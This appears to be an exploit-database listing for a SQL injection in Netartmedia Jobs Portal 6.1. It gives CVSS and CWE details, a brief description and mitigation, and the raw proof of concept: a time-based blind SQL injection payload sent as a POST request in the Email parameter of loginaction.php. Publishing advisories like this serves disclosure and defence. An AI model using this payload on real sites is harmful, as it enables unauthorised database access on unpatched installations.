header-logo
Suggest Exploit
vendor:
Jobs Portal
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Jobs Portal
Affected Version From: 6.1
Affected Version To: 6.1
Patch Exists: NO
Related CWE: N/A
CPE: a:netartmedia:jobs_portal:6.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Netartmedia Jobs Portal 6.1 – SQL Injection

Netartmedia Jobs Portal 6.1 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted payload to the loginaction.php page. The payload is sent as a POST parameter in the form of an email address. The payload is designed to cause the application to pause for a period of time, indicating a successful exploitation of the vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in any SQL query.
Source

Exploit-DB raw data:

# Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/jobsportal/
# Demo Site: https://www.ittjobs.com/
# Version: 6.1
# Tested on: Kali Linux
# CVE: N/A

----- PoC SQLi -----

Request: http://localhost/[PATH]/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

Navigation

Suggest Exploit

Services By CQR